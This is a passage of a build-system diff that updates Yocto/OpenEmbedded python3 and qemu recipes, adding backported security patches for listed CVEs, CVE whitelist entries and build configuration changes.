-+Tests for CJK codecs no longer call ``eval()`` on content received via HTTP.
diff --git a/meta/recipes-devtools/python/python3/CVE-2023-24329.patch b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
new file mode 100644
index 0000000000..23dec65602
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
@@ -0,0 +1,80 @@
+From 72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9 Mon Sep 17 00:00:00 2001
+From: "Miss Islington (bot)"
+ <31488909+miss-islington@users.noreply.github.com>
+Date: Sun, 13 Nov 2022 11:00:25 -0800
+Subject: [PATCH] gh-99418: Make urllib.parse.urlparse enforce that a scheme
+ must begin with an alphabetical ASCII character. (GH-99421)
+
+Prevent urllib.parse.urlparse from accepting schemes that don't begin with an alphabetical ASCII character.
+
+RFC 3986 defines a scheme like this: `scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )`
+RFC 2234 defines an ALPHA like this: `ALPHA = %x41-5A / %x61-7A`
+
+The WHATWG URL spec defines a scheme like this:
+`"A URL-scheme string must be one ASCII alpha, followed by zero or more of ASCII alphanumeric, U+002B (+), U+002D (-), and U+002E (.)."`
+(cherry picked from commit 439b9cfaf43080e91c4ad69f312f21fa098befc7)
+
+Co-authored-by: Ben Kallus <49924171+kenballus@users.noreply.github.com>
+
+Upstream-Status: Backport [https://github.com/python/cpython/commit/72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9]
+CVE: CVE-2023-24329
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ Lib/test/test_urlparse.py | 18 ++++++++++++++++++
+ Lib/urllib/parse.py | 2 +-
+ ...22-11-12-15-45-51.gh-issue-99418.FxfAXS.rst | 2 ++
+ 3 files changed, 21 insertions(+), 1 deletion(-)
+ create mode 100644 Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+
+diff --git a/Lib/test/test_urlparse.py b/Lib/test/test_urlparse.py
+index 0ad3bf1..e1aa913 100644
+--- a/Lib/test/test_urlparse.py
++++ b/Lib/test/test_urlparse.py
+@@ -735,6 +735,24 @@ class UrlParseTestCase(unittest.TestCase):
+ with self.assertRaises(ValueError):
+ p.port
+
++ def test_attributes_bad_scheme(self):
++ """Check handling of invalid schemes."""
++ for bytes in (False, True):
++ for parse in (urllib.parse.urlsplit, urllib.parse.urlparse):
++ for scheme in (".", "+", "-", "0", "http&", "६http"):
++ with self.subTest(bytes=bytes, parse=parse, scheme=scheme):
++ url = scheme + "://www.example.net"
++ if bytes:
++ if url.isascii():
++ url = url.encode("ascii")
++ else:
++ continue
++ p = parse(url)
++ if bytes:
++ self.assertEqual(p.scheme, b"")
++ else:
++ self.assertEqual(p.scheme, "")
++
+ def test_attributes_without_netloc(self):
+ # This example is straight from RFC 3261. It looks like it
+ # should allow the username, hostname, and port to be filled
+diff --git a/Lib/urllib/parse.py b/Lib/urllib/parse.py
+index 979e6d2..2e7a3e2 100644
+--- a/Lib/urllib/parse.py
++++ b/Lib/urllib/parse.py
+@@ -452,7 +452,7 @@ def urlsplit(url, scheme='', allow_fragments=True):
+ clear_cache()
+ netloc = query = fragment = ''
+ i = url.find(':')
+- if i > 0:
++ if i > 0 and url[0].isascii() and url[0].isalpha():
+ if url[:i] == 'http': # optimize the common case
+ url = url[i+1:]
+ if url[:2] == '//':
+diff --git a/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+new file mode 100644
+index 0000000..0a06e7c
+--- /dev/null
++++ b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+@@ -0,0 +1,2 @@
++Fix bug in :func:`urllib.parse.urlparse` that causes URL schemes that begin
++with a digit, a plus sign, or a minus sign to be parsed incorrectly.
+--
+2.25.1
diff --git a/meta/recipes-devtools/python/python3/makerace.patch b/meta/recipes-devtools/python/python3/makerace.patch
new file mode 100644
index 0000000000..8971f28b8e
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/makerace.patch
@@ -0,0 +1,23 @@
+libainstall installs python-config.py but the .pyc cache files are generated
+by the libinstall target. This means some builds may not generate the pyc files
+for python-config.py depending on the order things happen in. This means builds
+are not always reproducible.
+
+Add a dependency to avoid the race.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: Python-3.8.11/Makefile.pre.in
+===================================================================
+--- Python-3.8.11.orig/Makefile.pre.in
++++ Python-3.8.11/Makefile.pre.in
+@@ -1415,7 +1415,7 @@ LIBSUBDIRS= tkinter tkinter/test tkinter
+ unittest unittest/test unittest/test/testmock \
+ venv venv/scripts venv/scripts/common venv/scripts/posix \
+ curses pydoc_data
+-libinstall: build_all $(srcdir)/Modules/xxmodule.c
++libinstall: build_all $(srcdir)/Modules/xxmodule.c libainstall
+ @for i in $(SCRIPTDIR) $(LIBDEST); \
+ do \
+ if test ! -d $(DESTDIR)$$i; then \
diff --git a/meta/recipes-devtools/python/python3/python3-manifest.json b/meta/recipes-devtools/python/python3/python3-manifest.json
index 3bcc9b8662..0e87f91dd8 100644
--- a/meta/recipes-devtools/python/python3/python3-manifest.json
+++ b/meta/recipes-devtools/python/python3/python3-manifest.json
@@ -531,7 +531,9 @@
"rdepends": [
"core"
],
- "files": [],
+ "files": [
+ "${libdir}/python${PYTHON_MAJMIN}/distutils/command/wininst-*.exe"
+ ],
"cached": []
},
"distutils": {
diff --git a/meta/recipes-devtools/python/python3_3.8.2.bb b/meta/recipes-devtools/python/python3_3.8.18.bb
index 1d0b4cdb77..9d0f72ecf9 100644
--- a/meta/recipes-devtools/python/python3_3.8.2.bb
+++ b/meta/recipes-devtools/python/python3_3.8.18.bb
@@ -1,9 +1,10 @@
SUMMARY = "The Python Programming Language"
HOMEPAGE = "http://www.python.org"
-LICENSE = "PSFv2"
+DESCRIPTION = "Python is a programming language that lets you work more quickly and integrate your systems more effectively."
+LICENSE = "PSF-2.0 & BSD-0-Clause"
SECTION = "devel/python"
-LIC_FILES_CHKSUM = "file://LICENSE;md5=203a6dbc802ee896020a47161e759642"
+LIC_FILES_CHKSUM = "file://LICENSE;md5=07fc4b9a9c0c0e48050ed38a5e72552b"
SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
file://run-ptest \
@@ -32,10 +33,8 @@ SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
file://0001-configure.ac-fix-LIBPL.patch \
file://0001-python3-Do-not-hardcode-lib-for-distutils.patch \
file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \
- file://0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch \
- file://CVE-2020-14422.patch \
- file://CVE-2020-26116.patch \
- file://CVE-2020-27619.patch \
+ file://makerace.patch \
+ file://CVE-2023-24329.patch \
"
SRC_URI_append_class-native = " \
@@ -44,19 +43,26 @@ SRC_URI_append_class-native = " \
file://0001-Don-t-search-system-for-headers-libraries.patch \
"
-SRC_URI[md5sum] = "e9d6ebc92183a177b8e8a58cad5b8d67"
-SRC_URI[sha256sum] = "2646e7dc233362f59714c6193017bb2d6f7b38d6ab4a0cb5fbac5c36c4d845df"
+SRC_URI[md5sum] = "5ea6267ea00513fc31d3746feb35842d"
+SRC_URI[sha256sum] = "3ffb71cd349a326ba7b2fadc7e7df86ba577dd9c4917e52a8401adbda7405e3f"
# exclude pre-releases for both python 2.x and 3.x
UPSTREAM_CHECK_REGEX = "[Pp]ython-(?P<pver>\d+(\.\d+)+).tar"
CVE_PRODUCT = "python"
+# Upstream consider this expected behaviour
+CVE_CHECK_WHITELIST += "CVE-2007-4559"
# This is not exploitable when glibc has CVE-2016-10739 fixed.
CVE_CHECK_WHITELIST += "CVE-2019-18348"
# This is windows only issue.
-CVE_CHECK_WHITELIST += "CVE-2020-15523"
+CVE_CHECK_WHITELIST += "CVE-2020-15523 CVE-2022-26488"
+# The mailcap module is insecure by design, so this can't be fixed in a meaningful way.
+# The module will be removed in the future and flaws documented.
+CVE_CHECK_WHITELIST += "CVE-2015-20107"
+# Not an issue, in fact expected behaviour
+CVE_CHECK_WHITELIST += "CVE-2023-36632"
PYTHON_MAJMIN = "3.8"
@@ -73,7 +79,7 @@ ALTERNATIVE_LINK_NAME[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config
ALTERNATIVE_TARGET[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config-${MULTILIB_SUFFIX}"
-DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2"
+DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2 autoconf-archive"
DEPENDS_append_class-target = " python3-native"
DEPENDS_append_class-nativesdk = " python3-native"
@@ -309,11 +315,8 @@ do_create_manifest() {
}
# bitbake python -c create_manifest
-addtask do_create_manifest
-
# Make sure we have native python ready when we create a new manifest
-do_create_manifest[depends] += "${PN}:do_prepare_recipe_sysroot"
-do_create_manifest[depends] += "${PN}:do_patch"
+addtask do_create_manifest after do_patch do_prepare_recipe_sysroot
# manual dependency additions
RRECOMMENDS_${PN}-core_append_class-nativesdk = " nativesdk-python3-modules"
@@ -335,6 +338,7 @@ PACKAGES =+ "libpython3 libpython3-staticdev"
FILES_libpython3 = "${libdir}/libpython*.so.*"
FILES_libpython3-staticdev += "${libdir}/python${PYTHON_MAJMIN}/config-${PYTHON_MAJMIN}-*/libpython${PYTHON_MAJMIN}.a"
INSANE_SKIP_${PN}-dev += "dev-elf"
+INSANE_SKIP_${PN}-ptest += "dev-deps"
# catch all the rest (unsorted)
PACKAGES += "${PN}-misc"
@@ -350,10 +354,16 @@ FILES_${PN}-man = "${datadir}/man"
# See https://bugs.python.org/issue18748 and https://bugs.python.org/issue37395
RDEPENDS_libpython3_append_libc-glibc = " libgcc"
RDEPENDS_${PN}-ctypes_append_libc-glibc = " ${MLPREFIX}ldconfig"
-RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests unzip bzip2 libgcc tzdata-europe coreutils sed"
+RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests ${PN}-dev unzip bzip2 libgcc tzdata-europe coreutils sed"
RDEPENDS_${PN}-ptest_append_libc-glibc = " locale-base-tr-tr.iso-8859-9"
RDEPENDS_${PN}-tkinter += "${@bb.utils.contains('PACKAGECONFIG', 'tk', 'tk tk-lib', '', d)}"
RDEPENDS_${PN}-dev = ""
RDEPENDS_${PN}-tests_append_class-target = " bash"
RDEPENDS_${PN}-tests_append_class-nativesdk = " bash"
+
+# Python's tests contain large numbers of files we don't need in the recipe sysroots
+SYSROOT_PREPROCESS_FUNCS += " py3_sysroot_cleanup"
+py3_sysroot_cleanup () {
+ rm -rf ${SYSROOT_DESTDIR}${libdir}/python${PYTHON_MAJMIN}/test
+}
diff --git a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
index d83ee59375..5ae6a37f26 100644
--- a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
@@ -9,7 +9,7 @@ DEPENDS = "glib-2.0-native zlib-native pixman-native qemu-native bison-native"
EXTRA_OECONF_append = " --target-list=${@get_qemu_system_target_list(d)}"
-PACKAGECONFIG ??= "fdt alsa kvm"
+PACKAGECONFIG ??= "fdt alsa kvm slirp"
# Handle distros such as CentOS 5 32-bit that do not have kvm support
PACKAGECONFIG_remove = "${@'kvm' if not os.path.exists('/usr/include/linux/kvm.h') else ''}"
diff --git a/meta/recipes-devtools/qemu/qemu.inc b/meta/recipes-devtools/qemu/qemu.inc
index 067179fdeb..59ff69d51d 100644
--- a/meta/recipes-devtools/qemu/qemu.inc
+++ b/meta/recipes-devtools/qemu/qemu.inc
@@ -28,35 +28,154 @@ SRC_URI = "https://download.qemu.org/${BPN}-${PV}.tar.xz \
file://0009-Fix-webkitgtk-builds.patch \
file://0010-configure-Add-pkg-config-handling-for-libgcrypt.patch \
file://0011-hw-i386-pc-fix-regression-in-parsing-vga-cmdline-par.patch \
+ file://0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch \
file://CVE-2019-15890.patch \
file://CVE-2020-1711.patch \
file://CVE-2020-7039-1.patch \
file://CVE-2020-7039-2.patch \
file://CVE-2020-7039-3.patch \
file://0001-Add-enable-disable-udev.patch \
- file://CVE-2020-7211.patch \
- file://0001-qemu-Do-not-include-file-if-not-exists.patch \
+ file://CVE-2020-7211.patch \
+ file://0001-qemu-Do-not-include-file-if-not-exists.patch \
file://CVE-2020-11102.patch \
- file://CVE-2020-11869.patch \
- file://CVE-2020-13361.patch \
- file://CVE-2020-10761.patch \
- file://CVE-2020-10702.patch \
- file://CVE-2020-13659.patch \
- file://CVE-2020-13800.patch \
- file://CVE-2020-13362.patch \
- file://CVE-2020-15863.patch \
- file://CVE-2020-14364.patch \
- file://CVE-2020-14415.patch \
- file://CVE-2020-16092.patch \
- file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \
- file://CVE-2019-20175.patch \
- file://CVE-2020-24352.patch \
- "
+ file://CVE-2020-11869.patch \
+ file://CVE-2020-13361.patch \
+ file://CVE-2020-10761.patch \
+ file://CVE-2020-10702.patch \
+ file://CVE-2020-13659.patch \
+ file://CVE-2020-13800.patch \
+ file://CVE-2020-13362.patch \
+ file://CVE-2020-15863.patch \
+ file://CVE-2020-14364.patch \
+ file://CVE-2020-14415.patch \
+ file://CVE-2020-16092.patch \
+ file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \
+ file://CVE-2019-20175.patch \
+ file://CVE-2020-24352.patch \
+ file://CVE-2020-25723.patch \
+ file://CVE-2021-20203.patch \
+ file://CVE-2021-3392.patch \
+ file://CVE-2020-25085.patch \
+ file://CVE-2020-25624_1.patch \
+ file://CVE-2020-25624_2.patch \
+ file://CVE-2020-25625.patch \
+ file://CVE-2020-29443.patch \
+ file://CVE-2021-20221.patch \
+ file://CVE-2021-20181.patch \
+ file://CVE-2021-3416_1.patch \
+ file://CVE-2021-3416_2.patch \
+ file://CVE-2021-3416_3.patch \
+ file://CVE-2021-3416_5.patch \
+ file://CVE-2021-3416_6.patch \
+ file://CVE-2021-3416_7.patch \
+ file://CVE-2021-3416_8.patch \
+ file://CVE-2021-3416_9.patch \
+ file://CVE-2021-3416_10.patch \
+ file://CVE-2021-20257.patch \
+ file://CVE-2021-3544.patch \
+ file://CVE-2021-3544_2.patch \
+ file://CVE-2021-3544_3.patch \
+ file://CVE-2021-3544_4.patch \
+ file://CVE-2021-3544_5.patch \
+ file://CVE-2021-3545.patch \
+ file://CVE-2021-3546.patch \
+ file://CVE-2021-3527-1.patch \
+ file://CVE-2021-3527-2.patch \
+ file://CVE-2021-3582.patch \
+ file://CVE-2021-3607.patch \
+ file://CVE-2021-3608.patch \
+ file://CVE-2020-12829_1.patch \
+ file://CVE-2020-12829_2.patch \
+ file://CVE-2020-12829_3.patch \
+ file://CVE-2020-12829_4.patch \
+ file://CVE-2020-12829_5.patch \
+ file://CVE-2020-27617.patch \
+ file://CVE-2020-28916.patch \
+ file://CVE-2021-3682.patch \
+ file://CVE-2020-13253_1.patch \
+ file://CVE-2020-13253_2.patch \
+ file://CVE-2020-13253_3.patch \
+ file://CVE-2020-13253_4.patch \
+ file://CVE-2020-13253_5.patch \
+ file://CVE-2020-13791.patch \
+ file://CVE-2022-35414.patch \
+ file://CVE-2020-27821.patch \
+ file://CVE-2020-13754-1.patch \
+ file://CVE-2020-13754-2.patch \
+ file://CVE-2020-13754-3.patch \
+ file://CVE-2020-13754-4.patch \
+ file://CVE-2021-3713.patch \
+ file://CVE-2021-3748.patch \
+ file://CVE-2021-3930.patch \
+ file://CVE-2021-4206.patch \
+ file://CVE-2021-4207.patch \
+ file://CVE-2022-0216-1.patch \
+ file://CVE-2022-0216-2.patch \
+ file://CVE-2021-3750.patch \
+ file://CVE-2021-3638.patch \
+ file://CVE-2021-20196.patch \
+ file://CVE-2021-3507.patch \
+ file://hw-block-nvme-refactor-nvme_addr_read.patch \
+ file://hw-block-nvme-handle-dma-errors.patch \
+ file://CVE-2021-3929.patch \
+ file://CVE-2022-4144.patch \
+ file://CVE-2020-15859.patch \
+ file://CVE-2020-15469-1.patch \
+ file://CVE-2020-15469-2.patch \
+ file://CVE-2020-15469-3.patch \
+ file://CVE-2020-15469-4.patch \
+ file://CVE-2020-15469-5.patch \
+ file://CVE-2020-15469-6.patch \
+ file://CVE-2020-15469-7.patch \
+ file://CVE-2020-15469-8.patch \
+ file://CVE-2020-35504.patch \
+ file://CVE-2020-35505.patch \
+ file://CVE-2022-26354.patch \
+ file://CVE-2021-3409-1.patch \
+ file://CVE-2021-3409-2.patch \
+ file://CVE-2021-3409-3.patch \
+ file://CVE-2021-3409-4.patch \
+ file://CVE-2021-3409-5.patch \
+ file://hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch \
+ file://CVE-2023-0330.patch \
+ file://CVE-2023-3354.patch \
+ file://CVE-2023-3180.patch \
+ file://CVE-2020-24165.patch \
+ file://CVE-2023-5088.patch \
+ file://9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch \
+ file://CVE-2023-2861.patch \
+ "
UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar"
SRC_URI[md5sum] = "278eeb294e4b497e79af7a57e660cb9a"
SRC_URI[sha256sum] = "d3481d4108ce211a053ef15be69af1bdd9dde1510fda80d92be0f6c3e98768f0"
+# Applies against virglrender < 0.6.0 and not qemu itself
+CVE_CHECK_WHITELIST += "CVE-2017-5957"
+
+# The VNC server can expose host files uder some circumstances. We don't
+# enable it by default.
+CVE_CHECK_WHITELIST += "CVE-2007-0998"
+
+# 'The issues identified by this CVE were determined to not constitute a vulnerability.'
+# https://bugzilla.redhat.com/show_bug.cgi?id=1609015#c11
+CVE_CHECK_WHITELIST += "CVE-2018-18438"
+
+# the issue introduced in v5.1.0-rc0
+CVE_CHECK_WHITELIST += "CVE-2020-27661"
+
+# As per https://nvd.nist.gov/vuln/detail/CVE-2023-0664
+# https://bugzilla.redhat.com/show_bug.cgi?id=2167423
+# this bug related to windows specific.
+CVE_CHECK_WHITELIST += "CVE-2023-0664"
+
+# As per https://bugzilla.redhat.com/show_bug.cgi?id=2203387
+# RHEL specific issue
+CVE_CHECK_WHITELIST += "CVE-2023-2680"
+
+# Affected only `qemu-kvm` shipped with Red Hat Enterprise Linux 8.3 release.
+CVE_CHECK_WHITELIST += "CVE-2021-20295"
+
COMPATIBLE_HOST_mipsarchn32 = "null"
COMPATIBLE_HOST_mipsarchn64 = "null"
@@ -195,6 +314,16 @@ PACKAGECONFIG[glusterfs] = "--enable-glusterfs,--disable-glusterfs"
PACKAGECONFIG[xkbcommon] = "--enable-xkbcommon,--disable-xkbcommon,libxkbcommon"
PACKAGECONFIG[libudev] = "--enable-libudev,--disable-libudev,eudev"
PACKAGECONFIG[libxml2] = "--enable-libxml2,--disable-libxml2,libxml2"
+PACKAGECONFIG[seccomp] = "--enable-seccomp,--disable-seccomp,libseccomp"
+PACKAGECONFIG[capstone] = "--enable-capstone,--disable-capstone"
+# libnfs is currently provided by meta-kodi
+PACKAGECONFIG[libnfs] = "--enable-libnfs,--disable-libnfs,libnfs"
+PACKAGECONFIG[brlapi] = "--enable-brlapi,--disable-brlapi"
+PACKAGECONFIG[vde] = "--enable-vde,--disable-vde"
+# version 4.2.0 doesn't have an "internal" option for enable-slirp, so use "git" which uses the same configure code path
+PACKAGECONFIG[slirp] = "--enable-slirp=git,--disable-slirp"
+PACKAGECONFIG[rbd] = "--enable-rbd,--disable-rbd"
+PACKAGECONFIG[rdma] = "--enable-rdma,--disable-rdma"
INSANE_SKIP_${PN} = "arch"
diff --git a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
index 3a7d7bbd33..3789f1edea 100644
--- a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
+++ b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
@@ -60,7 +60,7 @@ Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
-index 6f132c5f..8329950c 100644
+index 300c9765..2823db7d 100644
--- a/fsdev/virtfs-proxy-helper.c
+++ b/fsdev/virtfs-proxy-helper.c
@@ -13,7 +13,6 @@
@@ -71,9 +71,9 @@ index 6f132c5f..8329950c 100644
#include <sys/fsuid.h>
#include <sys/vfs.h>
#include <sys/ioctl.h>
-@@ -27,7 +26,11 @@
- #include "9p-iov-marshal.h"
+@@ -28,7 +27,11 @@
#include "hw/9pfs/9p-proxy.h"
+ #include "hw/9pfs/9p-util.h"
#include "fsdev/9p-iov-marshal.h"
-
+/*
@@ -84,3 +84,6 @@ index 6f132c5f..8329950c 100644
#define PROGNAME "virtfs-proxy-helper"
#ifndef XFS_SUPER_MAGIC
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch b/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch
new file mode 100644
index 0000000000..741a4fce0e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch
@@ -0,0 +1,48 @@
+From 00b5032eaddb7193f03f0a28b10286244d2e2a7b Mon Sep 17 00:00:00 2001
+From: Carlos Santos <casantos@redhat.com>
+Date: Thu, 17 Oct 2019 09:37:13 -0300
+Subject: [PATCH 1/1] util/cacheinfo: fix crash when compiling with uClibc
+
+uClibc defines _SC_LEVEL1_ICACHE_LINESIZE and _SC_LEVEL1_DCACHE_LINESIZE
+but the corresponding sysconf calls returns -1, which is a valid result,
+meaning that the limit is indeterminate.
+
+Handle this situation using the fallback values instead of crashing due
+to an assertion failure.
+
+Signed-off-by: Carlos Santos <casantos@redhat.com>
+Message-Id: <20191017123713.30192-1-casantos@redhat.com>
+Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
+
+Upstream-status: Backport
+Signed-off-by: Andrei Gherzan <andrei.gherzan@huawei.com>
+---
+ util/cacheinfo.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/util/cacheinfo.c b/util/cacheinfo.c
+index ea6f3e99bf..d94dc6adc8 100644
+--- a/util/cacheinfo.c
++++ b/util/cacheinfo.c
+@@ -93,10 +93,16 @@ static void sys_cache_info(int *isize, int *dsize)
+ static void sys_cache_info(int *isize, int *dsize)
+ {
+ # ifdef _SC_LEVEL1_ICACHE_LINESIZE
+- *isize = sysconf(_SC_LEVEL1_ICACHE_LINESIZE);
++ int tmp_isize = (int) sysconf(_SC_LEVEL1_ICACHE_LINESIZE);
++ if (tmp_isize > 0) {
++ *isize = tmp_isize;
++ }
+ # endif
+ # ifdef _SC_LEVEL1_DCACHE_LINESIZE
+- *dsize = sysconf(_SC_LEVEL1_DCACHE_LINESIZE);
++ int tmp_dsize = (int) sysconf(_SC_LEVEL1_DCACHE_LINESIZE);
++ if (tmp_dsize > 0) {
++ *dsize = tmp_dsize;
++ }
+ # endif
+ }
+ #endif /* sys_cache_info */
+--
+2.30.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
new file mode 100644
index 0000000000..72d9c47bde
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
@@ -0,0 +1,63 @@
+From a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b Mon Sep 17 00:00:00 2001
+From: Omar Sandoval <osandov@fb.com>
+Date: Thu, 14 May 2020 08:06:43 +0200
+Subject: [PATCH] 9pfs: local: ignore O_NOATIME if we don't have permissions
+
+QEMU's local 9pfs server passes through O_NOATIME from the client. If
+the QEMU process doesn't have permissions to use O_NOATIME (namely, it
+does not own the file nor have the CAP_FOWNER capability), the open will
+fail. This causes issues when from the client's point of view, it
+believes it has permissions to use O_NOATIME (e.g., a process running as
+root in the virtual machine). Additionally, overlayfs on Linux opens
+files on the lower layer using O_NOATIME, so in this case a 9pfs mount
+can't be used as a lower layer for overlayfs (cf.
+https://github.com/osandov/drgn/blob/dabfe1971951701da13863dbe6d8a1d172ad9650/vmtest/onoatimehack.c
+and https://github.com/NixOS/nixpkgs/issues/54509).
+
+Luckily, O_NOATIME is effectively a hint, and is often ignored by, e.g.,
+network filesystems. open(2) notes that O_NOATIME "may not be effective
+on all filesystems. One example is NFS, where the server maintains the
+access time." This means that we can honor it when possible but fall
+back to ignoring it.
+
+Acked-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Signed-off-by: Omar Sandoval <osandov@fb.com>
+Message-Id: <e9bee604e8df528584693a4ec474ded6295ce8ad.1587149256.git.osandov@fb.com>
+Signed-off-by: Greg Kurz <groug@kaod.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b]
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/9pfs/9p-util.h | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
+index 79ed6b233e5..546f46dc7dc 100644
+--- a/hw/9pfs/9p-util.h
++++ b/hw/9pfs/9p-util.h
+@@ -37,9 +37,22 @@ static inline int openat_file(int dirfd, const char *name, int flags,
+ {
+ int fd, serrno, ret;
+
++again:
+ fd = openat(dirfd, name, flags | O_NOFOLLOW | O_NOCTTY | O_NONBLOCK,
+ mode);
+ if (fd == -1) {
++ if (errno == EPERM && (flags & O_NOATIME)) {
++ /*
++ * The client passed O_NOATIME but we lack permissions to honor it.
++ * Rather than failing the open, fall back without O_NOATIME. This
++ * doesn't break the semantics on the client side, as the Linux
++ * open(2) man page notes that O_NOATIME "may not be effective on
++ * all filesystems". In particular, NFS and other network
++ * filesystems ignore it entirely.
++ */
++ flags &= ~O_NOATIME;
++ goto again;
++ }
+ return -1;
+ }
+
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch
new file mode 100644
index 0000000000..6fee4f640d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch
@@ -0,0 +1,164 @@
+From e29da77e5fddf6480e3a0e80b63d703edaec751b Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH] sm501: Convert printf + abort to qemu_log_mask
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Some places already use qemu_log_mask() to log unimplemented features
+or errors but some others have printf() then abort(). Convert these to
+qemu_log_mask() and avoid aborting to prevent guests to easily cause
+denial of service.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: 305af87f59d81e92f2aaff09eb8a3603b8baa322.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 57 ++++++++++++++++++++++------------------------
+ 1 file changed, 27 insertions(+), 30 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index acc692531a..bd3ccfe311 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -727,8 +727,8 @@ static void sm501_2d_operation(SM501State *s)
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+ if (addressing != 0x0) {
+- printf("%s: only XY addressing is supported.\n", __func__);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
++ return;
+ }
+
+ if (rop_mode == 0) {
+@@ -754,8 +754,8 @@ static void sm501_2d_operation(SM501State *s)
+
+ if ((s->twoD_source_base & 0x08000000) ||
+ (s->twoD_destination_base & 0x08000000)) {
+- printf("%s: only local memory is supported.\n", __func__);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
++ return;
+ }
+
+ switch (operation) {
+@@ -823,9 +823,9 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+
+ default:
+- printf("non-implemented SM501 2D operation. %d\n", operation);
+- abort();
+- break;
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
++ operation);
++ return;
+ }
+
+ if (dst_base >= get_fb_addr(s, crt) &&
+@@ -892,9 +892,8 @@ static uint64_t sm501_system_config_read(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 system config : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
